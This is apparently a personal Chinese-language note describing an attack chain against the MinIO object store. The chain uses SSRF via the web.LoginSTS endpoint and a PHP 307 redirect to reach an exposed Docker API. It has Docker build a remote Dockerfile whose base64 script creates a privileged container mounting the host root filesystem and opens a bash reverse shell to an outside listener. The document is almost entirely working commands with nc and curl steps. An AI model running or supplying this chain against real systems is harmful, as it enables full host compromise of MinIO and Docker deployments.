minio

created: 2026-01-27 13:32
tags:
  - minio
  - SSRF
  - Docker
aliases:
  - Minio SSRF docker APi 盲打
Type:
title:
updated: 2026-01-27 13:33

MinIO 是一个高性能的分布式对象存储系统
https://github.com/minio/minio
Pasted image 20260127133334.png

1. Minio SSRF docker APi 盲打

https://zone.huoxian.cn/d/2801-minio-ssrf-docker-api
CloudNet > minio ssrf docker api 盲打
Pasted image 20260127134311.png

#!/usr/bin/env bash  
  
# 1  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    'POST /containers/create HTTP/1.1'  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/json'  
    'Content-Length: 133'  
    ''  
    '{"HostName":"remoteCreate","User":"root","Image":"172.22.18.64/public/mysql:5.6","HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}'  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
    if [[ $data == '{"Id":"'* ]]; then  
        echo $data | cut -c 8-12 > /tmp/id  
    fi  
done  
exec 3>&-  
  
# 2  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    "POST /containers/`cat /tmp/id`/start HTTP/1.1"  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/x-www-form-urlencoded'  
    'Content-Length: 0'  
    ''  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
done  
exec 3>&-  
  
# 3  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    "POST /containers/`cat /tmp/id`/exec HTTP/1.1"  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/json'  
    'Content-Length: 75'  
    ''  
    '{"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/172.22.18.23/19999 0>&1"]}'  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
    if [[ $data == '{"Id":"'* ]]; then  
        echo $data | cut -c 8-71 > /tmp/id  
    fi  
done  
exec 3>&-  
  
# 4  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    "POST /exec/`cat /tmp/id`/start HTTP/1.1"  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/json'  
    'Content-Length: 27'  
    ''  
    '{"Detach":true,"Tty":false}'  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
done  
exec 3>&-

编码为base64然后放到一个Dockerfile中
再把Dockerfile放到一个 minio可以访问到的服务器上

FROM 172.22.18.64/public/mysql:5.6

RUN echo IyEvdXNyL(上面的BASE64编码) |base64 -d >/tmp/1.sh
RUN chmod +x /tmp/1.sh && /tmp/1.sh

再在服务器上创建一个index.php （如果有index.html需要删掉）

<?php
header('Location: http://127.0.0.1:2375/build?remote=http://172.22.18.23/Dockerfile&nocache=true&t=evil:2', false, 307);

remote是我们的服务器地址

开启监听

nc -lvnp 19999

发包

curl -X POST http://172.22.18.29:9000/minio/webrpc \
     -H "Host: 172.22.18.23" \
     -H "Content-Type: application/json" \
     -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" \
     -d '{"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}'